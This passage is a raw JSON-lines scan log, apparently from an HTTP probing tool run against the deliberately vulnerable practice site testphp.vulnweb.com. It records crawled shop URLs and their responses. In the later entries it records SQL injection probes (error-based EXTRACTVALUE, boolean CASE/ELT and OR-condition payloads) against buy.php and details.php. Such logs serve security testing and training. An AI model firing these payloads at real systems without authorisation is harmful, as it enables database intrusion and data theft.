.864119958Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/2L\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/2L\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/2L\",\"time\":\"359.008069ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":17,\"lines\":2,\"status_code\":200,\"content_length\":319,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:17.904069103Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/A01\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/A01\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/A01\",\"time\":\"344.474047ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":17,\"lines\":2,\"status_code\":200,\"content_length\":319,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:17.949727786Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/Connection:\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/Connection:\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/Connection:\",\"time\":\"353.366466ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":17,\"lines\":2,\"status_code\":200,\"content_length\":319,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:17.951690838Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/Details/web-camera-\",\"time\":\"348.133791ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:18.047889981Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/Details/web-camera-a4tech/\",\"time\":\"350.048686ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:18.193270733Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/\",\"time\":\"344.677116ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":11,\"lines\":2,\"status_code\":200,\"content_length\":279,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:18.273908439Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/1\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/1\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/1\",\"time\":\"347.9333ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":11,\"lines\":2,\"status_code\":200,\"content_length\":279,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:18.359264156Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/1L\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/1L\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/1L\",\"time\":\"353.033595ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":11,\"lines\":2,\"status_code\":200,\"content_length\":279,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:18.378183059Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/A01\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/A01\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/A01\",\"time\":\"352.928757ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":11,\"lines\":2,\"status_code\":200,\"content_length\":279,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:18.444423295Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/Connection:\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/Connection:\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/Connection:\",\"time\":\"362.39501ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":11,\"lines\":2,\"status_code\":200,\"content_length\":279,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:18.504722441Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-1 - Copy.html\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-1%20-%20Copy.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/RateProduct-1%20-%20Copy.html\",\"time\":\"362.050337ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":137,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:18.672248795Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-1.bak.html\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-1.bak.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/RateProduct-1.bak.html\",\"time\":\"349.661814ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":137,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:18.745945281Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-1.htmlA01\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-1.htmlA01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/RateProduct-1.htmlA01\",\"time\":\"348.637191ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:18.747167034Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-1.html\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-1.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/RateProduct-1.html\",\"time\":\"357.015313ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":12,\"lines\":2,\"status_code\":200,\"content_length\":100,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:18.791585279Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-2.html\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-2.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/RateProduct-2.html\",\"time\":\"357.438656ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":8,\"lines\":2,\"status_code\":200,\"content_length\":76,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:18.97349254Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-2.htmlA01\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-2.htmlA01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/RateProduct-2.htmlA01\",\"time\":\"356.765831ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:22.251161265Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-3.html\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-3.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/RateProduct-3.html\",\"time\":\"355.632655ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":11,\"lines\":2,\"status_code\":200,\"content_length\":93,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:22.339420984Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-3.htmlA01\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-3.htmlA01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/RateProduct-3.htmlA01\",\"time\":\"342.890847ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:22.425539422Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/buy.php\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/buy.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/buy.php\",\"time\":\"354.21692ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":6,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:22.466748781Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/buy.php?id=-\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/buy.php?id=-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/buy.php?id=-\",\"time\":\"350.97104ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":136,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:23.189672969Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/buy.php?id=-1%20AND%20((SELECT%20\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/buy.php?id=-1%20AND%20((SELECT%20\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/buy.php?id=-1%20AND%20((SELECT%20\",\"time\":\"340.619653ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":136,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:23.194013954Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/buy.php?id=-1%20AND%20((SELECT%201%20FROM%20(SELECT%202\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/buy.php?id=-1%20AND%20((SELECT%201%20FROM%20(SELECT%202\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/buy.php?id=-1%20AND%20((SELECT%201%20FROM%20(SELECT%202\",\"time\":\"345.1271ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":136,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:23.451365929Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=%28EXTRACTVALUE%289159%2CCONCAT%280x5c%2C0x7176627671%2C%28SELECT%20%28ELT%289159%3D9159%2C1%29%29%29%2C0x716a627a71%29%29%29\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=%28EXTRACTVALUE%289159%2CCONCAT%280x5c%2C0x7176627671%2C%28SELECT%20%28ELT%289159%3D9159%2C1%29%29%29%2C0x716a627a71%29%29%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=%28EXTRACTVALUE%289159%2CCONCAT%280x5c%2C0x7176627671%2C%28SELECT%20%28ELT%289159%3D9159%2C1%29%29%29%2C0x716a627a71%29%29%29\",\"time\":\"354.100931ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":16,\"lines\":4,\"status_code\":200,\"content_length\":181,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:23.949479977Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=%28SELECT%20%28CASE%20WHEN%20%284470%3D4470%29%20THEN%200x2d31204f522031372d372533643130%20ELSE%20%28SELECT%206525%20UNION%20SELECT%208527%29%20END%29%29\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=%28SELECT%20%28CASE%20WHEN%20%284470%3D4470%29%20THEN%200x2d31204f522031372d372533643130%20ELSE%20%28SELECT%206525%20UNION%20SELECT%208527%29%20END%29%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=%28SELECT%20%28CASE%20WHEN%20%284470%3D4470%29%20THEN%200x2d31204f522031372d372533643130%20ELSE%20%28SELECT%206525%20UNION%20SELECT%208527%29%20END%29%29\",\"time\":\"350.424512ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":2,\"lines\":2,\"status_code\":200,\"content_length\":47,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:24.086043742Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7176627671%2C%28SELECT%20%28ELT%287306%3D7306%2C1%29%29%29%2C0x716a627a71%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7176627671%2C%28SELECT%20%28ELT%287306%3D7306%2C1%29%29%29%2C0x716a627a71%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7176627671%2C%28SELECT%20%28ELT%287306%3D7306%2C1%29%29%29%2C0x716a627a71%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29\",\"time\":\"349.878426ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":16,\"lines\":4,\"status_code\":200,\"content_length\":181,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:27.158130017Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=%28SELECT%20CONCAT%280x7176627671%2C%28ELT%289737%3D9737%2C1%29%29%2C0x716a627a71%29%29\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=%28SELECT%20CONCAT%280x7176627671%2C%28ELT%289737%3D9737%2C1%29%29%2C0x716a627a71%29%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=%28SELECT%20CONCAT%280x7176627671%2C%28ELT%289737%3D9737%2C1%29%29%2C0x716a627a71%29%29\",\"time\":\"345.212651ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":2,\"lines\":2,\"status_code\":200,\"content_length\":47,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:27.174437203Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=%28SELECT%20CONCAT%28CONCAT%280x7176627671%2C%28CASE%20WHEN%20%282186%3D2186%29%20THEN%200x31%20ELSE%200x30%20END%29%29%2C0x716a627a71%29%29\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=%28SELECT%20CONCAT%28CONCAT%280x7176627671%2C%28CASE%20WHEN%20%282186%3D2186%29%20THEN%200x31%20ELSE%200x30%20END%29%29%2C0x716a627a71%29%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=%28SELECT%20CONCAT%28CONCAT%280x7176627671%2C%28CASE%20WHEN%20%282186%3D2186%29%20THEN%200x31%20ELSE%200x30%20END%29%29%2C0x716a627a71%29%29\",\"time\":\"355.199619ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":2,\"lines\":2,\"status_code\":200,\"content_length\":47,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:27.448152301Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%20%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7176627671%2C%28SELECT%20%28ELT%286905%3D6905%2C1%29%29%29%2C0x716a627a71%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%20%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7176627671%2C%28SELECT%20%28ELT%286905%3D6905%2C1%29%29%29%2C0x716a627a71%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%20%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7176627671%2C%28SELECT%20%28ELT%286905%3D6905%2C1%29%29%29%2C0x716a627a71%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29\",\"time\":\"348.376292ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":16,\"lines\":4,\"status_code\":200,\"content_length\":181,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:28.188661119Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%201589%3D1589\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%201589%3D1589\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%201589%3D1589\",\"time\":\"345.69645ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":17,\"lines\":2,\"status_code\":200,\"content_length\":319,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:28.216284429Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%202979%3D8651\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%202979%3D8651\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%202979%3D8651\",\"time\":\"349.254276ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":2,\"lines\":2,\"status_code\":200,\"content_length\":47,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:28.251837637Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%203298%3D3298%23\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%203298%3D3298%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%203298%3D3298%23\",\"time\":\"345.203322ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":17,\"lines\":2,\"status_code\":200,\"content_length\":319,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:28.304823556Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%205213%3D2807%23\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%205213%3D2807%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%205213%3D2807%23\",\"time\":\"353.003094ms\",\"a\":[\"44.228.249.3\"],\"tech